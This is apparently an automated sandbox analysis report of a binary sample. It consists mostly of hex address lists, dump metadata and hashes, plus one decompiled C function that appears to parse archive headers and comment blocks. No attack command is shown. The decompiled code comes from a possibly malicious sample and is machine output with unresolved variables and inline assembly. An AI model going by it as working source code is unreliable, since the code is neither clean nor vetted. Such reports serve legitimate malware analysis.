                0x003fe258
                0x003fe1a6
                0x003fe1a6
                0x003fe1ac
                0x003fe1ae
                0x003fe1c3
                0x003fe1c6
                0x00000000
                0x003fe1cc
                0x003fe1cc
                0x003fe1d3
                0x00000000
                0x003fe1d9
                0x003fe1df
                0x003fe1e1
                0x003fe1e7
                0x003fe1e7
                0x003fe1e9
                0x003fe1e9
                0x003fe1eb
                0x003fe1f4
                0x003fe1fb
                0x003fe1fe
                0x003fe1ff
                0x003fe201
                0x003fe201
                0x003fe2ba
                0x003fe2ba
                0x003fe2bc
                0x00000000
                0x003fe2c2
                0x003fe2c2
                0x003fe2c8
                0x003fe2cb
                0x003fe20e
                0x003fe215
                0x00000000
                0x003fe2d1
                0x003fe2d3
                0x003fe2d9
                0x003fe2df
                0x003fe2e0
                0x003fe4d7
                0x003fe4d7
                0x003fe4de
                0x003fe4df
                0x003fe4e0
                0x003fe4e5
                0x003fe4e8
                0x003fe4e8
                0x003fe2cb
                0x003fe2bc
                0x003fe1d3
                0x003fe1b0
                0x003fe1b0
                0x003fe1b2
                0x003fe1b8
                0x003fe462
                0x003fe462
                0x003fe463
                0x003fe469
                0x003fe469
                0x003fe470
                0x003fe471
                0x003fe472
                0x003fe477
                0x003fe47a
                0x003fe47a
                0x003fe47a
                0x003fe1ae
                0x003fe47c
                0x003fe47c
                0x003fe47e
                0x003fe4ec
                0x003fe4f3
                0x003fe4f3
                0x003fe4f3
                0x003fe4fa
                0x003fe4fc
                0x003fe502
                0x003fe503
                0x003fe9af
                0x003fe9af
                0x003fe9b0
                0x003fe9b1
                0x003fe9b6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe480
                0x003fe486
                0x003fe486
                0x003fe48c
                0x003fe48c
                0x003fe498
                0x00000000
                0x003fe498
                0x003fe127
                0x003fe9b9
                0x003fe9b9
                0x003fe9bf
                0x003fe9c1
                0x003fe9c7
                0x003fe9cd
                0x003fe9cf
                0x003fe9d1
                0x003fe9d3
                0x003fe9d3
                0x003fe9d5
                0x003fe9d5
                0x003fe9de
                0x003fe9df
                0x003fe9e3
                0x003fe9ea
                0x003fe9ed
                0x003fe9ee
                0x003fe9f0
                0x003fe9f0
                0x003fe9f4
                0x003fe9fa
                0x003fe9fc
                0x003fea02
                0x003fea04
                0x003fea0a
                0x003fea0d
                0x003fea20
                0x003fea23
                0x003fea29
                0x003fea3e
                0x003fea43
                0x003fea0f
                0x003fea11
                0x003fea18
                0x003fea18
                0x003fea0d
                0x003fea46
                0x003fea46
                0x003fea56
                0x003fea5f
                0x003fea60
                0x003fea62
                0x003feaf9
                0x003feafb
                0x003feb06
                0x003feb06
                0x003feb08
                0x003feb0b
                0x003feb0d
                0x00000000
                0x003feafd
                0x003feb03
                0x003feb03
                0x003fea68
                0x003fea68
                0x003fea6e
                0x003fea71
                0x003fea77
                0x003fea7a
                0x003fea80
                0x003fea82
                0x003fea88
                0x003fea8a
                0x003fea8c
                0x003fea8c
                0x003fea8e
                0x003fea8e
                0x003fea9b
                0x003feaa2
                0x003feaa5
                0x003feaa6
                0x003feaa8
                0x003feaa9
                0x003feaa9
                0x003feaad
                0x003feab3
                0x003feab5
                0x003feab7
                0x003feabd
                0x003feac0
                0x003fead4
                0x003feada
                0x003feaef
                0x003feaf4
                0x003feac2
                0x003feac2
                0x003feac9
                0x003feac9
                0x003feac0
                0x003feab5
                0x003feb13
                0x003feb13
                0x003feb13
                0x003feb1f
                0x003feb22
                0x003feb28
                0x003feb2a
                0x003feb2c
                0x003feb32
                0x003feb34
                0x003feb34
                0x003feb34
                0x003feb32
                0x003feb39
                0x003feb3a
                0x003feb3c
                0x003feb3e
                0x003feb3e
                0x003feb40
                0x003feb46
                0x003feb4c
                0x003feb4e
                0x003feb54
                0x003feb54
                0x003feb5a
                0x003feb5c
                0x00000000
                0x00000000
                0x003feb62
                0x003feb64
                0x003feb66
                0x003feb66
                0x003feb68
                0x003feb68
                0x003feb78
                0x003feb7f
                0x003feb82
                0x003feb83
                0x003feb85
                0x003feb85
                0x003feb89
                0x003feb8f
                0x003feb91
                0x003feb93
                0x003feb99
                0x003feb9c
                0x003febad
                0x003febb0
                0x003febb6
                0x003febcb
                0x003febd0
                0x003feb9e
                0x003feb9e
                0x003feba5
                0x003feba5
                0x003feb9c
                0x003febe1
                0x003febf0
                0x003febf1
                0x003febf1
                0x003febf3
                0x003febf5
                0x003febf5
                0x003febfb
                0x003febfe
                0x003fec00
                0x003fec02
                0x003fec02
                0x003fec05
                0x003fec06
                0x003fec06
                0x003fec0b
                0x003fec0e
                0x003fec12
                0x003fec12
                0x003fec13
                0x003fec15
                0x003fec1b
                0x003fec21
                0x00000000
                0x00000000
                0x00000000
                0x003fec21
                0x003feb54
                0x003fec27
                0x003fec27
                0x00000000
                0x003fec27
                0x003fd9ac
                0x003fd9a3
                0x003fd99a
                0x003fd951
                0x003fd955
                0x003fd95d
                0x00000000
                0x003fd95f
                0x003fd965
                0x003fd96a
                0x003fec46
                0x003fec46
                0x003fec49
                0x003fec54
                0x003fec7f
                0x003fec80
                0x003fec81
                0x003fec82
                0x003fec83
                0x003fec84
                0x003fec89
                0x003fec8a
                0x003fec91
                0x003fec96
                0x003fec9c
                0x003feca1
                0x003feca2
                0x003feca2
                0x003feca2
                0x003feca8
                0x003feca9
                0x003feca9
                0x003fecac
                0x003fecb2
                0x00000000
                0x00000000
                0x003fecb4
                0x003fecb9
                0x003fecbc
                0x003fecbe
                0x003fecc6
                0x003fecc8
                0x003fecca
                0x003feccf
                0x003fecd2
                0x003fecd8
                0x003fecdb
                0x003fecdd
                0x003fecdd
                0x003fecdd
                0x003fecdd
                0x003fecdb
                0x003fece0
                0x003fecec
                0x003fecf2
                0x003fecfa
                0x003fecff
                0x003fed00
                0x003fed05
                0x003fed05
                0x003fed05
                0x003fed05
                0x003fed09
                0x003fed09
                0x003fed0c
                0x003fed13
                0x003fed20
                0x003fec56
                0x003fec56
                0x003fec56
                0x003fec5d
                0x003fec5e
                0x003fec5f
                0x003fec60
                0x003fec69
                0x003fec6e
                0x003fec7c
                0x003fec7c
                0x003fec54
                0x003fd95d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: b41b466513a7b43611569b1ca2d972aaa63dfb34c49e19ed7e0c0baf9181b36e
                • Instruction ID: 91ed1cc6f4fd2d8bad87256f9fdbb9377839899c82da3eadb9e172cc36941097
                • Opcode Fuzzy Hash: b41b466513a7b43611569b1ca2d972aaa63dfb34c49e19ed7e0c0baf9181b36e
                • Instruction Fuzzy Hash: BFC24B71E0862C8FDB26CE28DD447EAB7B9EB44305F1541EAD94DE7250E778AE818F40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 59%
                			E003D32F7(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				void* _t237;
				signed int _t240;
				void* _t246;
				unsigned int _t248;
				unsigned int _t252;
				void* _t253;
				signed int _t257;
				char _t269;
				signed int _t277;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t319;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t363;
				intOrPtr _t370;
				void* _t373;
				intOrPtr _t374;
				void* _t381;
				signed int _t383;
				void* _t384;
				signed int _t395;
				intOrPtr* _t399;
				signed int _t414;
				signed int _t423;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				signed int _t502;
				signed char _t503;
				signed int _t504;
				unsigned int _t505;
				intOrPtr _t514;
				void* _t515;
				void* _t522;
				signed int _t525;
				void* _t526;
				signed int _t536;
				void* _t542;
				void* _t544;
				intOrPtr _t547;
				void* _t548;
				void* _t550;
				void* _t551;
				intOrPtr _t561;

				_t551 = _t550 - 0x68;
				E003EEB78(0x4026be, _t548);
				E003EEC50(0x2068);
				_t399 = __ecx;
				E003DCB83(_t548 + 0x30, __ecx);
				 *(_t548 + 0x64) = 0;
				 *((intOrPtr*)(_t548 - 4)) = 0;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L18:
					 *((char*)(_t548 + 0x6a)) = 0;
					L19:
					_push(7);
					_t237 = E003DCD8A();
					__eflags = _t237 - 7;
					if(_t237 >= 7) {
						 *(_t399 + 0x220c) = 0;
						 *(_t399 + 0x21fc) = E003DCBFB(_t548 + 0x30);
						_t536 = E003DCD66(_t548 + 0x30, 4);
						_t240 = E003DCCFB();
						__eflags = _t240 | _t500;
						if((_t240 | _t500) == 0) {
							L88:
							E003D20D7(_t399);
							L89:
							E003D15FB(_t548 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t548 - 0xc));
							return  *(_t548 + 0x64);
						}
						__eflags = _t536;
						if(_t536 == 0) {
							goto L88;
						}
						_t46 = _t536 + 4; // 0x4
						_t47 = _t536 - 3; // -3
						_t514 = _t46 + _t240;
						_t414 = _t47 + _t240;
						__eflags = _t414;
						if(_t414 < 0) {
							goto L88;
						}
						__eflags = _t514 - 7;
						if(_t514 < 7) {
							goto L88;
						}
						_push(_t414);
						E003DCD8A();
						__eflags =  *(_t548 + 0x48) - _t514;
						if( *(_t548 + 0x48) < _t514) {
							goto L20;
						}
						_t246 = E003DCCDB(_t548 + 0x30);
						 *(_t399 + 0x2200) = E003DCCFB();
						_t248 = E003DCCFB();
						 *(_t399 + 0x2204) = _t248;
						 *((intOrPtr*)(_t399 + 0x2208)) = _t514;
						_t515 = _t399 + 0x21fc;
						 *(_t399 + 0x220c) = _t248 >> 0x00000002 & 0x00000001;
						__eflags =  *_t515 - _t246;
						 *(_t399 + 0x21f4) =  *(_t399 + 0x2200);
						_t60 = _t548 + 0x6b;
						 *_t60 =  *_t515 != _t246;
						__eflags =  *_t60;
						if( *_t60 == 0) {
							L29:
							_t252 = 0;
							__eflags =  *(_t399 + 0x2204) & 0x00000001;
							 *(_t548 + 0x58) = 0;
							 *(_t548 + 0x54) = 0;
							if(( *(_t399 + 0x2204) & 0x00000001) == 0) {
								L33:
								__eflags =  *(_t399 + 0x2204) & 0x00000002;
								_t539 = _t252;
								 *(_t548 + 0x60) = _t252;
								 *(_t548 + 0x5c) = _t252;
								if(( *(_t399 + 0x2204) & 0x00000002) != 0) {
									_t363 = E003DCCFB();
									_t539 = _t363;
									 *(_t548 + 0x60) = _t363;
									 *(_t548 + 0x5c) = _t500;
								}
								_t253 = E003D1983(_t399,  *((intOrPtr*)(_t399 + 0x2208)));
								asm("adc ecx, edx");
								 *((intOrPtr*)(_t399 + 0x6cc0)) = E003D3EFB(_t253 +  *((intOrPtr*)(_t399 + 0x6cb8)),  *((intOrPtr*)(_t399 + 0x6cbc)), _t539,  *(_t548 + 0x5c), 0, 0);
								 *((intOrPtr*)(_t399 + 0x6cc4)) = 0;
								_t502 =  *(_t399 + 0x2200);
								_t257 = _t502 - 1;
								__eflags = _t257;
								if(_t257 == 0) {
									E003DAD5E(_t399 + 0x2220);
									_t423 = 5;
									memcpy(_t399 + 0x2220, _t515, _t423 << 2);
									_t503 = E003DCCFB();
									 *(_t399 + 0x6ccd) = _t503 & 1;
									 *(_t399 + 0x6ccc) = _t503 >> 0x00000002 & 1;
									_t432 = 1;
									 *((char*)(_t399 + 0x6cd2)) = 1;
									 *(_t399 + 0x6ccf) = _t503 >> 0x00000004 & 1;
									 *(_t399 + 0x6cd3) = _t503 >> 0x00000003 & 1;
									_t269 = 0;
									 *((char*)(_t399 + 0x6cd0)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										_t504 = 0;
									} else {
										_t504 = E003DCCFB();
										_t269 = 0;
										_t432 = 1;
									}
									 *(_t399 + 0x6cf0) = _t504;
									__eflags =  *(_t399 + 0x6ccd);
									if( *(_t399 + 0x6ccd) == 0) {
										L84:
										_t432 = _t269;
										goto L85;
									} else {
										__eflags = _t504;
										if(_t504 == 0) {
											L85:
											 *((char*)(_t399 + 0x6cd1)) = _t432;
											_t433 =  *(_t548 + 0x58);
											__eflags = _t433 |  *(_t548 + 0x54);
											if((_t433 |  *(_t548 + 0x54)) != 0) {
												E003D2210(_t399, _t504, _t548 + 0x30, _t433, _t399 + 0x2220);
											}
											goto L87;
										}
										goto L84;
									}
								} else {
									_t277 = _t257 - 1;
									__eflags = _t277;
									if(_t277 == 0) {
										L49:
										__eflags = _t502 - 2;
										_t121 = (0 | _t502 == 0x00000002) - 1; // -1
										_t522 = (_t121 & 0x00002350) + 0x2298 + _t399;
										 *(_t548 + 0x2c) = _t522;
										E003DACC4(_t522, 0);
										_t438 = 5;
										memcpy(_t522, _t399 + 0x21fc, _t438 << 2);
										_t542 =  *(_t548 + 0x2c);
										 *(_t548 + 0x64) =  *(_t399 + 0x2200);
										 *(_t542 + 0x1058) =  *(_t548 + 0x60);
										 *((char*)(_t542 + 0x10f9)) = 1;
										 *(_t542 + 0x105c) =  *(_t548 + 0x5c);
										 *(_t542 + 0x1094) = E003DCCFB();
										 *(_t542 + 0x1060) = E003DCCFB();
										_t289 =  *(_t542 + 0x1094) >> 0x00000003 & 0x00000001;
										__eflags = _t289;
										 *(_t542 + 0x1064) = _t502;
										 *(_t542 + 0x109a) = _t289;
										if(_t289 != 0) {
											 *(_t542 + 0x1060) = 0x7fffffff;
											 *(_t542 + 0x1064) = 0x7fffffff;
										}
										_t442 =  *(_t542 + 0x105c);
										_t525 =  *(_t542 + 0x1064);
										_t290 =  *(_t542 + 0x1058);
										_t505 =  *(_t542 + 0x1060);
										__eflags = _t442 - _t525;
										if(__eflags < 0) {
											L54:
											_t290 = _t505;
											_t442 = _t525;
											goto L55;
										} else {
											if(__eflags > 0) {
												L55:
												 *(_t542 + 0x106c) = _t442;
												 *(_t542 + 0x1068) = _t290;
												_t291 = E003DCCFB();
												__eflags =  *(_t542 + 0x1094) & 0x00000002;
												 *((intOrPtr*)(_t542 + 0x24)) = _t291;
												if(( *(_t542 + 0x1094) & 0x00000002) != 0) {
													E003E158F(_t542 + 0x1040, E003DCBFB(_t548 + 0x30), 0);
												}
												 *(_t542 + 0x1070) =  *(_t542 + 0x1070) & 0x00000000;
												__eflags =  *(_t542 + 0x1094) & 0x00000004;
												if(( *(_t542 + 0x1094) & 0x00000004) != 0) {
													 *(_t542 + 0x1070) = 2;
													 *((intOrPtr*)(_t542 + 0x1074)) = E003DCBFB(_t548 + 0x30);
												}
												 *(_t542 + 0x1100) =  *(_t542 + 0x1100) & 0x00000000;
												_t292 = E003DCCFB();
												 *(_t548 + 0x60) = _t292;
												 *(_t542 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
												_t450 = (_t292 & 0x0000003f) + 0x32;
												 *((intOrPtr*)(_t542 + 0x1c)) = _t450;
												__eflags = _t450 - 0x32;
												if(_t450 != 0x32) {
													 *((intOrPtr*)(_t542 + 0x1c)) = 0x270f;
												}
												 *((char*)(_t542 + 0x18)) = E003DCCFB();
												_t526 = E003DCCFB();
												 *(_t542 + 0x10fc) = 2;
												_t295 =  *((intOrPtr*)(_t542 + 0x18));
												 *(_t542 + 0x10f8) =  *(_t399 + 0x2204) >> 0x00000006 & 1;
												__eflags = _t295 - 1;
												if(_t295 != 1) {
													__eflags = _t295;
													if(_t295 == 0) {
														_t178 = _t542 + 0x10fc;
														 *_t178 =  *(_t542 + 0x10fc) & 0x00000000;
														__eflags =  *_t178;
													}
												} else {
													 *(_t542 + 0x10fc) = 1;
												}
												_t456 =  *(_t542 + 8);
												 *(_t542 + 0x1098) = _t456 >> 0x00000003 & 1;
												 *(_t542 + 0x10fa) = _t456 >> 0x00000005 & 1;
												__eflags =  *(_t548 + 0x64) - 2;
												_t459 =  *(_t548 + 0x60);
												 *(_t542 + 0x1099) = _t456 >> 0x00000004 & 1;
												if( *(_t548 + 0x64) != 2) {
													L68:
													_t302 = 0;
													__eflags = 0;
													goto L69;
												} else {
													__eflags = _t459 & 0x00000040;
													if((_t459 & 0x00000040) == 0) {
														goto L68;
													}
													_t302 = 1;
													L69:
													 *((char*)(_t542 + 0x10f0)) = _t302;
													_t304 =  *(_t542 + 0x1094) & 1;
													 *(_t542 + 0x10f1) = _t304;
													_t509 = 0x20000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x109c) =  ~( *(_t542 + 0x109b) & 0x000000ff) & 0x00000005;
													__eflags = _t526 - 0x1fff;
													if(_t526 >= 0x1fff) {
														_t526 = 0x1fff;
													}
													E003DCC5D(_t548 + 0x30, _t548 - 0x2074, _t526);
													 *((char*)(_t548 + _t526 - 0x2074)) = 0;
													_push(0x800);
													_t527 = _t542 + 0x28;
													_push(_t542 + 0x28);
													_push(_t548 - 0x2074);
													E003E1C3B();
													_t463 =  *(_t548 + 0x58);
													_t318 = _t463 |  *(_t548 + 0x54);
													__eflags = _t463 |  *(_t548 + 0x54);
													if((_t463 |  *(_t548 + 0x54)) != 0) {
														_t318 = E003D2210(_t399, _t509, _t548 + 0x30, _t463, _t542);
													}
													__eflags =  *(_t548 + 0x64) - 2;
													if( *(_t548 + 0x64) != 2) {
														_t319 = E003F3E49(_t318, _t527, L"CMT");
														__eflags = _t319;
														if(_t319 == 0) {
															 *((char*)(_t399 + 0x6cce)) = 1;
														}
													} else {
														E003D2134(_t399, _t542);
													}
													__eflags =  *(_t548 + 0x6b);
													if(__eflags != 0) {
														E003D2021(__eflags, 0x1c, _t399 + 0x32, _t527);
													}
													L87:
													 *(_t548 + 0x64) =  *(_t548 + 0x48);
													goto L89;
												}
											}
											__eflags = _t290 - _t505;
											if(_t290 > _t505) {
												goto L55;
											}
											goto L54;
										}
									}
									_t328 = _t277 - 1;
									__eflags = _t328;
									if(_t328 == 0) {
										goto L49;
									}
									_t329 = _t328 - 1;
									__eflags = _t329;
									if(_t329 == 0) {
										_t471 = 5;
										memcpy(_t399 + 0x2260, _t399 + 0x21fc, _t471 << 2);
										_t331 = E003DCCFB();
										__eflags = _t331;
										if(_t331 == 0) {
											 *(_t399 + 0x2274) = E003DCCFB() & 0x00000001;
											_t335 = E003DCBAF(_t548 + 0x30) & 0x000000ff;
											 *(_t399 + 0x2278) = _t335;
											__eflags = _t335 - 0x18;
											if(_t335 <= 0x18) {
												E003DCC5D(_t548 + 0x30, _t399 + 0x227c, 0x10);
												__eflags =  *(_t399 + 0x2274);
												if( *(_t399 + 0x2274) != 0) {
													_t544 = _t399 + 0x228c;
													E003DCC5D(_t548 + 0x30, _t544, 8);
													E003DCC5D(_t548 + 0x30, _t548 + 0x64, 4);
													E003E0016(_t548 - 0x74);
													_push(8);
													_push(_t544);
													_push(_t548 - 0x74);
													E003E005C();
													_push(_t548 + 8);
													E003DFF33(_t548 - 0x74);
													_t350 = E003F0C4A(_t548 + 0x64, _t548 + 8, 4);
													asm("sbb al, al");
													_t352 =  ~_t350 + 1;
													__eflags = _t352;
													 *(_t399 + 0x2274) = _t352;
												}
												 *((char*)(_t399 + 0x6cd4)) = 1;
												goto L87;
											}
											_push(_t335);
											_push(L"hc%u");
											L43:
											_push(0x14);
											_push(_t548);
											E003D4092();
											E003D403D(_t399, _t399 + 0x32, _t548);
											goto L89;
										}
										_push(_t331);
										_push(L"h%u");
										goto L43;
									}
									__eflags = _t329 == 1;
									if(_t329 == 1) {
										_t480 = 5;
										memcpy(_t399 + 0x45a8, _t399 + 0x21fc, _t480 << 2);
										 *(_t399 + 0x45c4) = E003DCCFB() & 0x00000001;
										 *((short*)(_t399 + 0x45c6)) = 0;
										 *((char*)(_t399 + 0x45c5)) = 0;
									}
									goto L87;
								}
							}
							_t485 = E003DCCFB();
							 *(_t548 + 0x54) = _t500;
							_t252 = 0;
							 *(_t548 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L33;
							}
							if(__eflags > 0) {
								goto L88;
							}
							__eflags = _t485 -  *((intOrPtr*)(_t399 + 0x2208));
							if(_t485 >=  *((intOrPtr*)(_t399 + 0x2208))) {
								goto L88;
							}
							goto L33;
						}
						E003D20D7(_t399);
						 *((char*)(_t399 + 0x6cdc)) = 1;
						E003D6D83(0x411098, 3);
						__eflags =  *((char*)(_t548 + 0x6a));
						if(__eflags == 0) {
							goto L29;
						} else {
							E003D2021(__eflags, 4, _t399 + 0x32, _t399 + 0x32);
							L6:
							 *((char*)(_t399 + 0x6cdd)) = 1;
							goto L89;
						}
					}
					L20:
					E003D3FFC(_t399, _t500);
					goto L89;
				}
				_t500 =  *((intOrPtr*)(__ecx + 0x6cd8)) + 8;
				asm("adc eax, ecx");
				_t561 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t561 < 0 || _t561 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t500) {
					goto L18;
				} else {
					_t370 =  *((intOrPtr*)(_t399 + 0x21d4));
					 *((char*)(_t548 + 0x6a)) = 1;
					_t563 =  *((intOrPtr*)(_t370 + 0x6127));
					if( *((intOrPtr*)(_t370 + 0x6127)) == 0) {
						 *0x403278(_t548 + 0x18, 0x10);
						_t373 =  *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xc))))();
						__eflags = _t373 - 0x10;
						if(_t373 != 0x10) {
							goto L20;
						}
						_t374 =  *((intOrPtr*)(_t399 + 0x21d4));
						__eflags =  *((char*)(_t374 + 0x6124));
						if( *((char*)(_t374 + 0x6124)) != 0) {
							L10:
							 *(_t548 + 0x6b) = 1;
							L11:
							E003D3E6D(_t399);
							_t534 = _t399 + 0x227c;
							_t547 = _t399 + 0x1038;
							E003D603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t399 + 0x227c, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
							__eflags =  *(_t399 + 0x2274);
							if( *(_t399 + 0x2274) == 0) {
								L16:
								 *((intOrPtr*)(_t548 + 0x50)) = _t547;
								goto L19;
							} else {
								_t381 = _t399 + 0x228c;
								while(1) {
									_t383 = E003F0C4A(_t548 + 0x28, _t381, 8);
									_t551 = _t551 + 0xc;
									__eflags = _t383;
									if(_t383 == 0) {
										goto L16;
									}
									__eflags =  *(_t548 + 0x6b);
									_t384 = _t399 + 0x32;
									_push(_t384);
									_push(_t384);
									if(__eflags != 0) {
										_push(6);
										E003D2021(__eflags);
										 *((char*)(_t399 + 0x6cdd)) = 1;
										E003D6D83(0x411098, 0xb);
										goto L89;
									}
									_push(0x83);
									E003D2021(__eflags);
									E003DF279( *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024);
									E003D3E6D(_t399);
									E003D603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t534, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
									__eflags =  *(_t399 + 0x2274);
									_t381 = _t399 + 0x228c;
									if( *(_t399 + 0x2274) != 0) {
										continue;
									}
									goto L16;
								}
								goto L16;
							}
						}
						_t395 = E003E1B63();
						 *(_t548 + 0x6b) = 0;
						__eflags = _t395;
						if(_t395 == 0) {
							goto L11;
						}
						goto L10;
					} else {
						E003D138B(_t563, 0x7f, _t399 + 0x32);
						goto L6;
					}
				}
			}



































































                0x003d32f8
                0x003d3300
                0x003d330a
                0x003d3311
                0x003d3318
                0x003d331f
                0x003d3322
                0x003d332b
                0x003d34a6
                0x003d34a6
                0x003d34a9
                0x003d34a9
                0x003d34ae
                0x003d34b3
                0x003d34b6
                0x003d34c7
                0x003d34d8
                0x003d34e6
                0x003d34e8
                0x003d34ef
                0x003d34f1
                0x003d3b09
                0x003d3b0b
                0x003d3b10
                0x003d3b13
                0x003d3b21
                0x003d3b2c
                0x003d3b2c
                0x003d34f7
                0x003d34f9
                0x00000000
                0x00000000
                0x003d34ff
                0x003d3502
                0x003d3505
                0x003d3507
                0x003d3507
                0x003d3509
                0x00000000
                0x00000000
                0x003d350f
                0x003d3512
                0x00000000
                0x00000000
                0x003d3518
                0x003d351c
                0x003d3521
                0x003d3524
                0x00000000
                0x00000000
                0x003d3529
                0x003d353b
                0x003d3541
                0x003d3546
                0x003d3551
                0x003d3557
                0x003d355d
                0x003d3563
                0x003d356b
                0x003d3571
                0x003d3571
                0x003d3571
                0x003d3575
                0x003d35a8
                0x003d35a8
                0x003d35aa
                0x003d35b1
                0x003d35b4
                0x003d35b7
                0x003d35e1
                0x003d35e1
                0x003d35e8
                0x003d35ea
                0x003d35ed
                0x003d35f0
                0x003d35f5
                0x003d35fa
                0x003d35fc
                0x003d35ff
                0x003d35ff
                0x003d360a
                0x003d3622
                0x003d362c
                0x003d3632
                0x003d3638
                0x003d3640
                0x003d3640
                0x003d3643
                0x003d3a50
                0x003d3a5f
                0x003d3a60
                0x003d3a6a
                0x003d3a73
                0x003d3a85
                0x003d3a8d
                0x003d3a90
                0x003d3a96
                0x003d3aa3
                0x003d3aa9
                0x003d3aab
                0x003d3ab1
                0x003d3ab4
                0x003d3ac7
                0x003d3ab6
                0x003d3abe
                0x003d3ac2
                0x003d3ac4
                0x003d3ac4
                0x003d3ac9
                0x003d3acf
                0x003d3ad6
                0x003d3adc
                0x003d3adc
                0x00000000
                0x003d3ad8
                0x003d3ad8
                0x003d3ada
                0x003d3ade
                0x003d3ade
                0x003d3ae4
                0x003d3ae9
                0x003d3aec
                0x003d3afc
                0x003d3afc
                0x00000000
                0x003d3aec
                0x00000000
                0x003d3ada
                0x003d3649
                0x003d3649
                0x003d3649
                0x003d364c
                0x003d3796
                0x003d3798
                0x003d37a0
                0x003d37af
                0x003d37b3
                0x003d37b6
                0x003d37bd
                0x003d37c4
                0x003d37cf
                0x003d37d2
                0x003d37d8
                0x003d37e1
                0x003d37e8
                0x003d37f6
                0x003d3801
                0x003d3810
                0x003d3810
                0x003d3812
                0x003d3818
                0x003d381e
                0x003d3825
                0x003d382b
                0x003d382b
                0x003d3831
                0x003d3837
                0x003d383d
                0x003d3843
                0x003d3849
                0x003d384b
                0x003d3853
                0x003d3853
                0x003d3855
                0x00000000
                0x003d384d
                0x003d384d
                0x003d3857
                0x003d3857
                0x003d3860
                0x003d3866
                0x003d386b
                0x003d3872
                0x003d3875
                0x003d3888
                0x003d3888
                0x003d388d
                0x003d3894
                0x003d389b
                0x003d38a0
                0x003d38af
                0x003d38af
                0x003d38b5
                0x003d38bf
                0x003d38c6
                0x003d38cf
                0x003d38d7
                0x003d38da
                0x003d38dd
                0x003d38e0
                0x003d38e2
                0x003d38e2
                0x003d38f4
                0x003d3908
                0x003d390a
                0x003d3914
                0x003d3919
                0x003d391f
                0x003d3921
                0x003d392b
                0x003d392d
                0x003d392f
                0x003d392f
                0x003d392f
                0x003d392f
                0x003d3923
                0x003d3923
                0x003d3923
                0x003d3936
                0x003d3940
                0x003d3952
                0x003d3958
                0x003d395c
                0x003d395f
                0x003d3965
                0x003d3970
                0x003d3970
                0x003d3970
                0x00000000
                0x003d3967
                0x003d3967
                0x003d396a
                0x00000000
                0x00000000
                0x003d396c
                0x003d3972
                0x003d3972
                0x003d397e
                0x003d3983
                0x003d3994
                0x003d3998
                0x003d399e
                0x003d39ad
                0x003d39b2
                0x003d39bd
                0x003d39bf
                0x003d39c1
                0x003d39c1
                0x003d39ce
                0x003d39d3
                0x003d39e1
                0x003d39e6
                0x003d39e9
                0x003d39ea
                0x003d39eb
                0x003d39f0
                0x003d39f5
                0x003d39f5
                0x003d39f8
                0x003d3a02
                0x003d3a02
                0x003d3a07
                0x003d3a0b
                0x003d3a1d
                0x003d3a24
                0x003d3a26
                0x003d3a28
                0x003d3a28
                0x003d3a0d
                0x003d3a10
                0x003d3a10
                0x003d3a2f
                0x003d3a33
                0x003d3a40
                0x003d3a40
                0x003d3b01
                0x003d3b04
                0x00000000
                0x003d3b04
                0x003d3965
                0x003d384f
                0x003d3851
                0x00000000
                0x00000000
                0x00000000
                0x003d3851
                0x003d384b
                0x003d3652
                0x003d3652
                0x003d3655
                0x00000000
                0x00000000
                0x003d365b
                0x003d365b
                0x003d365e
                0x003d36a0
                0x003d36ad
                0x003d36b2
                0x003d36b7
                0x003d36b9
                0x003d36f0
                0x003d36fb
                0x003d36fe
                0x003d3704
                0x003d3707
                0x003d371d
                0x003d3722
                0x003d3729
                0x003d372d
                0x003d3737
                0x003d3745
                0x003d374e
                0x003d3753
                0x003d3755
                0x003d3759
                0x003d375a
                0x003d3762
